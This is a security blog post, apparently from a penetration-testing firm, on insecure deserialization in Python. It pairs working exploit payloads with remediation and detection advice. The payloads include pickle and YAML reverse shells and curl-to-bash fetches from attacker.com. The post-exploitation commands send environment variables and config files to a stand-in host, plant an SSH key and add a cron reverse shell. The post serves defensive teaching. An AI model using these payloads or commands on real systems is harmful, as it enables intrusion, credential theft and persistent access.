If you are a developer, security engineer, or architect working with Python applications, understanding this vulnerability class is not optional. It is a prerequisite for building systems that survive contact with real-world adversaries.
This blog walks you through what insecure deserialization is, how attackers exploit it in Python, working proof-of-concept commands, and how to remediate it before it costs you.
What Is Serialization and Why Does It Matter
Serialization is the process of converting an in-memory object into a format that can be stored or transmitted, such as a byte stream, JSON blob, or XML document. Deserialization is the reverse: reconstructing the object from that format back into memory.
Serialization is used everywhere: session tokens, API payloads, caching layers, message queues, inter-process communication, and file storage. When the deserialization process trusts external input without validation, attackers can supply a crafted payload that forces the application to execute arbitrary code, escalate privileges, or exfiltrate data.
The root problem is not the concept of serialization itself. It is when applications deserialize data from untrusted sources using libraries that execute code during the reconstruction process.
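The round trip described in this section can be sketched with the standard json module. This is a minimal illustration; the session dictionary and its field names are hypothetical.

```python
import json

# An in-memory object (hypothetical session data).
session = {"user_id": 1, "role": "admin", "tags": ["a", "b"]}

# Serialize: object -> text that can be stored or sent over the network.
wire_format = json.dumps(session)

# Deserialize: text -> a new, equal object in memory.
restored = json.loads(wire_format)

print(type(wire_format).__name__)  # str
print(restored == session)         # True
```

JSON parsing only ever produces dicts, lists, strings, numbers, booleans, and None, which is why it avoids the code-execution problem that the libraries below have.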
Python's Most Dangerous Serialization Libraries
The pickle Module
Python's built-in pickle module is the most notorious offender. The official Python documentation itself warns that pickle is not secure against maliciously constructed data. Despite this, it remains widely used in data science pipelines, ML model storage, caching systems, and session management.
Pickle allows objects to define a __reduce__ method that controls how they are serialized and, critically, deserialized. Attackers abuse this to embed OS commands inside a pickled payload.
Generating a malicious pickle payload:
import pickle
import os
class MaliciousPayload(object):
    def __reduce__(self):
        return (os.system, ('id',))
payload = pickle.dumps(MaliciousPayload())
print(payload)
Triggering execution on the target:
import pickle
# Simulating what a vulnerable application does
data = b'\x80\x04\x95...' # Attacker-supplied bytes
pickle.loads(data) # This executes: os.system('id')
When the application calls pickle.loads() on attacker-controlled data, the command runs. There is no sandbox. There is no prompt. The payload executes in the context of the running process.
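To see the mechanism without running any OS command, the same pattern can be reproduced with a harmless callable. In this sketch the class name Harmless is hypothetical, and int stands in for os.system.

```python
import pickle

class Harmless:
    """Stand-in for a payload class; it asks pickle to call int("42")."""
    def __reduce__(self):
        # (callable, args): pickle.loads() will call callable(*args).
        return (int, ("42",))

blob = pickle.dumps(Harmless())
result = pickle.loads(blob)

# The result is whatever the callable returned, not a Harmless instance.
print(type(result).__name__, result)  # int 42
```

Note that the pickled bytes reference only the callable and its arguments. The receiving application does not need the payload class to be defined, which is why an attacker can build the payload entirely on their own machine.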
Reverse shell via pickle:
import pickle
import os
class ReverseShell(object):
    def __reduce__(self):
        cmd = "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
        return (os.system, (cmd,))
payload = pickle.dumps(ReverseShell())
# On attacker machine: nc -lvnp 4444
# Victim app receives and loads this payload
This is not theoretical. This exact technique has been used to compromise ML serving platforms, Flask-based APIs using pickled sessions, and internal tooling that caches Python objects.
If your organization's Python applications are handling serialized data from external sources, you need a professional assessment to determine your exposure. Redfox Cybersecurity's penetration testing services cover deserialization attack chains as part of a comprehensive web application engagement.
PyYAML and the yaml.load() Vulnerability
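YAML is widely used for configuration files, CI/CD pipelines, and API data. PyYAML's yaml.load() function, when it runs with an unsafe loader (yaml.Loader or yaml.UnsafeLoader), supports Python-specific tags that allow object instantiation during parsing. Before PyYAML 5.1, the unsafe loader was the default when no Loader was specified. Since PyYAML 6.0 the Loader argument is required, so vulnerable code on current versions passes an unsafe loader explicitly.
Vulnerable code:
import yaml
data = yaml.load(user_input) # Dangerous on PyYAML < 5.1: defaults to the unsafe loader
data = yaml.load(user_input, Loader=yaml.Loader) # Dangerous on any version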
Attacker-supplied YAML payload:
!!python/object/apply:os.system
args: ['curl http://attacker.com/shell.sh | bash']
When the application processes this string through yaml.load(), it executes the shell command. This is a one-liner exploit that requires no authentication bypass, no memory corruption, and no complex tooling.
Demonstrating the exploit:
python3 -c "
import yaml
payload = \"!!python/object/apply:os.system ['id']\"
yaml.load(payload, Loader=yaml.UnsafeLoader)
"
Output: The id command executes and prints the current user context of the process.
This class of vulnerability has affected well-known projects including Ansible and various DevOps tools. Any Python application that parses YAML from user-controlled input without using yaml.safe_load() is at risk.
jsonpickle: Dangerous by Design
jsonpickle is a library that serializes arbitrary Python objects to JSON. Unlike standard JSON, it preserves Python type information by embedding class references directly in the serialized output. This makes it trivially exploitable.
Crafting a jsonpickle RCE payload:
import jsonpickle
class Exploit(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('id')",))
serialized = jsonpickle.encode(Exploit())
print(serialized)
# Output: {"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": [...]}]}
Any application calling jsonpickle.decode() on this string will execute the embedded command.
Sending the payload over HTTP:
curl -X POST http://target.com/api/deserialize \
-H "Content-Type: application/json" \
-d '{"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": ["__import__(\"os\").system(\"id\")"]}]}'
If the endpoint passes the body through jsonpickle.decode(), code execution is immediate.
shelve and marshal
Python's shelve module uses pickle internally to store objects, meaning any application that reads shelve databases from untrusted sources inherits all of pickle's vulnerabilities.
marshal is no safer: the Python documentation states that it is not intended to be secure against erroneous or maliciously constructed data, and it should never be used to deserialize data from external sources.
import marshal
# Dangerous: deserializing attacker-controlled marshal data
code = marshal.loads(attacker_bytes)
exec(code) # Arbitrary code execution
How Attackers Identify Deserialization Vulnerabilities
Understanding the attacker's reconnaissance workflow helps defenders think like threat actors.
Step 1: Fingerprint the application stack
# Look for Python framework indicators in HTTP headers
curl -I http://target.com
# Check for Flask, Django, FastAPI signatures
# X-Powered-By, Server headers, error pages
Step 2: Intercept and decode serialized tokens
# Base64-decode suspicious cookies or parameters
echo "gASVHgAAAAAAAAB9lCiMAmlklEsBjARuYW1llIwFYWRtaW6Uu..." | base64 -d | xxd | head
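Pickle protocols 2 and later begin with the byte \x80 followed by the protocol version, so \x80\x03, \x80\x04, or \x80\x05 at the start indicates a pickle payload. In Base64, a protocol 4 pickle typically begins with gASV, as in the example above. Attackers immediately know what library to target.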
Step 3: Generate and encode the exploit payload
import pickle, os, base64
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl http://attacker.com/exfil?u=$(whoami)',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)
Step 4: Deliver the payload
# Inject into a cookie
curl http://target.com/dashboard \
-H "Cookie: session=gASV..."
# Inject into a POST parameter
curl -X POST http://target.com/api/upload \
-d "data=gASV..."
Step 5: Catch the callback
# On attacker machine, start a listener
nc -lvnp 80
# Or use a Burp Collaborator / interactsh instance
This five-step chain is what a real attacker executes. The window between an unpatched deserialization endpoint and full server compromise is minutes, not hours.
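Defenders can apply the fingerprinting idea from Step 2 without ever loading the data. The sketch below uses the standard pickletools module to list opcodes in a suspicious token. The function name risky_opcodes and the chosen opcode set are assumptions for illustration, not an exhaustive filter.

```python
import base64
import pickle
import pickletools

# Opcodes that import names or call/construct objects during loading.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def risky_opcodes(token_b64: str) -> set:
    """Return the risky opcode names found in a Base64-encoded pickle.

    pickletools.genops() only parses the opcode stream; it does not
    import modules or call anything referenced by the payload.
    """
    raw = base64.b64decode(token_b64)
    names = {op.name for op, _arg, _pos in pickletools.genops(raw)}
    return names & RISKY_OPCODES

class Callback:
    def __reduce__(self):
        return (int, ("42",))  # harmless stand-in for os.system

plain_token = base64.b64encode(pickle.dumps({"id": 1, "name": "admin"})).decode()
odd_token = base64.b64encode(pickle.dumps(Callback())).decode()

plain_findings = risky_opcodes(plain_token)
odd_findings = risky_opcodes(odd_token)
print(plain_findings)  # empty set: only plain containers and scalars
print(odd_findings)    # includes REDUCE
```

A token that contains REDUCE or a global lookup is not proof of an attack, since legitimate pickles of custom classes use the same opcodes. It is a signal that the endpoint accepts a format capable of code execution and deserves review.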
Want to know if your applications are vulnerable to this exact chain before attackers find it? Request a penetration test from Redfox Cybersecurity and get a professional, evidence-based assessment of your attack surface.
Real-World Impact: What Attackers Do After Initial Access
Gaining code execution through a deserialization vulnerability is only the beginning. Post-exploitation steps commonly include:
Privilege escalation:
# Check sudo rights
sudo -l
# Look for SUID binaries
find / -perm -4000 2>/dev/null
# Check for writable cron jobs
ls -la /etc/cron*
Lateral movement within the network:
# Scan internal network from the compromised host
python3 -c "
import socket
for port in [22, 80, 443, 3306, 5432, 6379, 27017]:
    s = socket.socket()
    s.settimeout(0.5)
    result = s.connect_ex(('10.0.0.1', port))
    if result == 0:
        print(f'Port {port} open')
    s.close()
"
Data exfiltration:
# Dump environment variables (often contains secrets, API keys, DB credentials)
env | base64 | curl -X POST http://attacker.com/collect -d @-
# Steal application secrets
cat /app/config.py | base64 | curl -X POST http://attacker.com/collect -d @-
Persistence:
# Add SSH key to authorized_keys
echo "ssh-rsa AAAA...attacker-key..." >> ~/.ssh/authorized_keys
# Write a cron job for persistent reverse shell
echo "* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1" | crontab -
A single deserialization endpoint can be the entry point for a full organizational breach. This is not a theoretical risk. It is the documented kill chain behind multiple high-profile ransomware deployments and data theft incidents.
Secure Remediation: How to Fix Insecure Deserialization in Python
Never Deserialize Untrusted Data with pickle
The simplest fix is to never use pickle, shelve, or marshal with data from external sources. There is no safe way to sandbox pickle deserialization in Python.
Switch to safer alternatives for data interchange:
import json
# Serialize
data = {"user_id": 1, "role": "admin"}
serialized = json.dumps(data)
# Deserialize safely
parsed = json.loads(serialized)
JSON, msgpack, and protobuf are appropriate formats for transmitting structured data between services. They do not execute code during parsing.
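When the application needs a typed object rather than a plain dict, one option is to parse JSON and then build the object explicitly, field by field. The sketch below assumes a hypothetical UserSession type and a hypothetical set of allowed roles.

```python
import json
from dataclasses import dataclass

@dataclass(frozen=True)
class UserSession:  # hypothetical application type
    user_id: int
    role: str

ALLOWED_ROLES = {"admin", "viewer"}  # hypothetical

def session_from_json(text: str) -> UserSession:
    """Parse JSON, then construct the object explicitly from checked fields."""
    raw = json.loads(text)  # raises ValueError (JSONDecodeError) on bad JSON
    if not isinstance(raw, dict):
        raise ValueError("expected a JSON object")
    user_id, role = raw.get("user_id"), raw.get("role")
    # bool is a subclass of int, so reject it explicitly.
    if not isinstance(user_id, int) or isinstance(user_id, bool):
        raise ValueError("user_id must be an integer")
    if not isinstance(role, str) or role not in ALLOWED_ROLES:
        raise ValueError("unknown role")
    return UserSession(user_id=user_id, role=role)

session = session_from_json('{"user_id": 1, "role": "admin"}')
print(session)  # UserSession(user_id=1, role='admin')
```

The input never chooses which class gets built. The code does, which is the property pickle lacks.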
Use yaml.safe_load() Instead of yaml.load()
import yaml
# Vulnerable
data = yaml.load(user_input, Loader=yaml.Loader)
# Secure
data = yaml.safe_load(user_input)
yaml.safe_load() only parses standard YAML types (strings, integers, lists, dicts) and does not support Python-specific tags that allow object instantiation.
Validate and Sign Serialized Data
If you must use pickle internally (for example, in ML pipelines where models are serialized), implement cryptographic signing to verify integrity before deserialization.
import pickle
import hmac
import hashlib

# Placeholder only: load the real key from a secrets store, never from source code
SECRET_KEY = b'your-secret-key-here'

def serialize_signed(obj):
    data = pickle.dumps(obj)
    signature = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest()
    return signature.encode() + b':' + data

def deserialize_verified(blob):
    # A hex signature never contains b':', so split at the first separator only
    sig, sep, data = blob.partition(b':')
    expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest().encode()
    # Compare as bytes: compare_digest raises TypeError on non-ASCII str input
    if not sep or not hmac.compare_digest(sig, expected_sig):
        raise ValueError("Invalid signature: data may have been tampered with")
    return pickle.loads(data)
This ensures that only data serialized by your own application can be deserialized. Attacker-crafted payloads will fail the signature check before pickle.loads() is ever called.
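The effect of the signature check can be demonstrated with a small self-contained variant. This sketch is an assumption-laden illustration, not the scheme above verbatim: it prefixes a fixed-length raw digest instead of a hex string, and it generates a random per-process key where a real deployment would load a shared key from a secrets store. The names sign and verify are hypothetical.

```python
import hashlib
import hmac
import os
import pickle

# Assumption: random demo key; real systems load a shared key securely.
KEY = os.urandom(32)
DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes

def sign(data: bytes) -> bytes:
    """Prefix the data with its HMAC-SHA256 digest."""
    return hmac.new(KEY, data, hashlib.sha256).digest() + data

def verify(blob: bytes) -> bytes:
    """Return the data if the digest matches, else raise ValueError."""
    sig, data = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("signature mismatch")
    return data

blob = sign(pickle.dumps({"model": "v1"}))
restored = pickle.loads(verify(blob))  # only unpickle after verification

# Flip one bit in the last byte to simulate tampering in transit.
tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
try:
    verify(tampered)
    tamper_detected = False
except ValueError:
    tamper_detected = True

print(restored, tamper_detected)  # {'model': 'v1'} True
```

Signing proves that the bytes came from a holder of the key. It does not make the pickle itself safe, so anyone who obtains the key can sign a malicious payload.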
Implement Allowlist-Based Deserialization
For cases where you need to support custom object types, use a custom unpickler that restricts which classes can be instantiated.
import pickle
import io
ALLOWED_CLASSES = {
    ('myapp.models', 'UserSession'),
    ('myapp.models', 'CartItem'),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_CLASSES:
            raise pickle.UnpicklingError(
                f"Blocked: {module}.{name} is not in the allowlist"
            )
        return super().find_class(module, name)

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
This approach stops arbitrary class instantiation while still allowing your application's own object types to be deserialized.
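A quick way to check such an unpickler is to feed it one allowed object and one payload that references a global outside the allowlist. The sketch below is self-contained, so it allowlists collections.OrderedDict instead of the myapp classes, and it uses int as a harmless stand-in for os.system. The names AllowlistUnpickler and NotAllowed are hypothetical.

```python
import io
import pickle
from collections import OrderedDict

ALLOWED = {("collections", "OrderedDict")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

class NotAllowed:
    def __reduce__(self):
        return (int, ("42",))  # harmless stand-in for os.system

ok = safe_loads(pickle.dumps(OrderedDict(a=1)))

try:
    safe_loads(pickle.dumps(NotAllowed()))
    blocked, reason = False, ""
except pickle.UnpicklingError as exc:
    blocked, reason = True, str(exc)

print(ok, blocked, reason)
```

The allowlist should stay as small as possible. Any allowed class whose constructor or state setter has side effects becomes part of the attack surface.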
Adopt Structured Serialization Formats
For service-to-service communication, move to schema-validated formats:
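import json

# Protocol Buffers: message classes are generated from a .proto schema
# Using Pydantic for schema validation
from pydantic import BaseModel

class UserPayload(BaseModel):
    user_id: int
    role: str
    permissions: list[str]

# Example input; in practice this is the raw request body
incoming_data = '{"user_id": 1, "role": "admin", "permissions": ["read"]}'

# Validation happens on construction; invalid input raises pydantic.ValidationError
user = UserPayload(**json.loads(incoming_data))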
Pydantic validates structure and types but does not instantiate arbitrary Python classes. It is a safe, production-grade alternative for API payload validation.
Detection: How to Find Deserialization Vulnerabilities in Your Codebase
Grep for dangerous patterns in your Python codebase:
# Find all pickle usage
grep -rn "pickle.loads\|pickle.load\|cPickle.loads" ./src
# Find unsafe YAML loading
grep -rn "yaml.load(" ./src | grep -v "safe_load"
# Find jsonpickle decode calls
grep -rn "jsonpickle.decode\|jsonpickle.loads" ./src
# Find marshal usage
grep -rn "marshal.loads\|marshal.load" ./src
# Find shelve usage with external data
grep -rn "shelve.open" ./src
Automate static analysis with Bandit:
pip install bandit
bandit -r ./src -t B301,B302,B506
Bandit rule B301 flags pickle calls, B302 flags marshal calls, and B506 flags unsafe yaml.load(). Integrate this into your CI/CD pipeline so vulnerabilities are caught before they reach production.
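Where grep produces too many false positives (comments, strings, yaml.safe_load lines), a small AST-based check is one alternative. The sketch below is an illustration under stated assumptions: the function name find_risky_calls and the RISKY_CALLS set are hypothetical, and it only catches direct module.function calls, not aliased imports such as "from pickle import loads".

```python
import ast

# (module name, function name) pairs to report.
RISKY_CALLS = {
    ("pickle", "load"), ("pickle", "loads"),
    ("marshal", "load"), ("marshal", "loads"),
    ("yaml", "load"),
    ("jsonpickle", "decode"), ("jsonpickle", "loads"),
    ("shelve", "open"),
}

def find_risky_calls(source: str, filename: str = "<string>") -> list:
    """Return sorted (line, 'module.function') pairs for risky calls."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and isinstance(node.func.value, ast.Name)):
            pair = (node.func.value.id, node.func.attr)
            if pair in RISKY_CALLS:
                findings.append((node.lineno, f"{pair[0]}.{pair[1]}"))
    return sorted(findings)

sample = (
    "import pickle, yaml\n"
    "x = pickle.loads(blob)\n"
    "y = yaml.safe_load(text)\n"
    "z = yaml.load(text)\n"
    "# pickle.loads(in_a_comment)\n"
)
findings = find_risky_calls(sample)
print(findings)  # [(2, 'pickle.loads'), (4, 'yaml.load')]
```

Because the source is parsed rather than executed, the check is safe to run on untrusted code. Treat it as a complement to Bandit, not a replacement.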
Dynamic scanning with custom payloads:
# Generate a detection payload that makes an out-of-band DNS request
python3 -c "
import pickle, os, base64
class Probe:
    def __reduce__(self):
        return (os.system, ('nslookup your-collaborator-id.oast.me',))
print(base64.b64encode(pickle.dumps(Probe())).decode())
"
Inject this into every parameter, cookie, and request body that appears to accept serialized data. If you receive a DNS callback, the endpoint is vulnerable.
Running these detection steps manually across a large application surface is time-intensive, and it is easy to miss endpoints. Professional penetration testing automates and validates this process across your entire attack surface. Engage Redfox Cybersecurity to conduct a thorough assessment of your Python applications, APIs, and internal tooling.
Closing Thoughts
Insecure deserialization in Python is not a niche vulnerability. It sits at the intersection of trusted libraries, common development patterns, and catastrophic impact. The Python ecosystem's reliance on pickle for ML model storage, session management, and caching means that the exposure is far broader than most development teams realize.
The attack primitives are well-documented, the tooling is publicly available, and the path from a deserialization endpoint to full server compromise is short. Developers need to treat serialized data from external sources the same way they treat SQL input: as inherently untrusted, requiring explicit validation and safe handling patterns.
Remediation starts with code: replace pickle with JSON or protobuf, switch yaml.load to yaml.safe_load, validate schemas with Pydantic, and integrate Bandit into your CI pipeline. But code review alone does not find everything. Runtime behavior, third-party dependencies, and undocumented internal endpoints often carry deserialization vulnerabilities that static analysis cannot surface.
That is where professional security testing closes the gap. Redfox Cybersecurity's penetration testing services combine automated scanning with manual exploitation techniques to identify deserialization vulnerabilities, prove impact through controlled exploitation, and deliver actionable remediation guidance your engineering team can act on immediately.
Do not wait for a breach to discover your exposure. Get ahead of it.